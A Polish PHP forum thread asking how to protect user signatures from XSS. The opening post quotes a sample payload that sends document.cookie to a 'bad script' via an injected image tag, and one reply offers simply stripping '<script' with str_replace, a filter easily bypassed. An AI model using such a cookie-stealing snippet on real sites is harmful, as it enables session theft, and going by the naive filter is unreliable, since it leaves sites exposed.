Jak zabezpieczyć np. podpis na forum

Jak zabezpieczyć np. podpis na forum, przed atakami XSS

TomASS Zobacz profil	15.02.2006, 12:19:34 Post #1
Grupa: Zarejestrowani Postów: 1 660 Pomógł: 13 Dołączył: 9.06.2004 Skąd: Wrocław i okolice Ostrzeżenie: (0%)	Tak sobie myślę, że w większości for jest podpis użytkownika. Niektóre fora nie filtrują podpisów (np. mogę dać w podpisie obrazek itp.) a jakby tak dać: [HTML] pobierz, plaintext <script type="text/javascript"> var adr = 'zly_skrypt.php?ciasteczka=' + escape(document.cookie); var obr = '<IMG src="' + adr + '">'; document.write(obr); </SCRIPT> [HTML] pobierz, plaintext To się chyba nazywa atak XSS. Jak się przed tym zabezpieczyć, aby np. akceptował obrazki, odnośniki itp. a nie akceptował "złych skryptów"?

Odpowiedzi

marcini82 Zobacz profil	15.02.2006, 16:23:48 Post #2
Grupa: Zarejestrowani Postów: 190 Pomógł: 1 Dołączył: 20.05.2005 Skąd: Poznań Ostrzeżenie: (0%)	Ja na poczatek wywalam (przy pomocy str_replace()) z danych od uzytkownika ciag '<script'

Posty w temacie

TomASS Jak zabezpieczyć np. podpis na forum 15.02.2006, 12:19:34

Ociu Daj tylko dozwolone znaki - bbCode. 15.02.2006, 12:29:25

marcini82 Ja na poczatek wywalam (przy pomocy str_replace())... 15.02.2006, 16:23:48

LonelyKnight Cytat(marcini82 @ 15.02.2006, 17:23:4... 10.07.2007, 20:56:34

gladiror Wrócę może do tego tematu bo mam konkretne pytanie... 10.07.2007, 19:35:39

maxserwer A mi się wydaje że tego przeglądarka może nie łykn... 10.07.2007, 22:30:16

gladiror użyłem htmlspecialchars i wyswietla mi w... 10.07.2007, 23:40:51

flv Przecież na tym polega działanie tej funkcji, zami... 10.07.2007, 23:54:28

marcini82 CytatA co jeśli zamiast '<script... 11.07.2007, 06:45:48

LonelyKnight Cytat(marcini82 @ 11.07.2007, 07:45:4... 11.07.2007, 07:27:19

2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych:

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Aktualny czas: 6.10.2025 - 15:00

Hosting zapewnia

Forum PHP.pl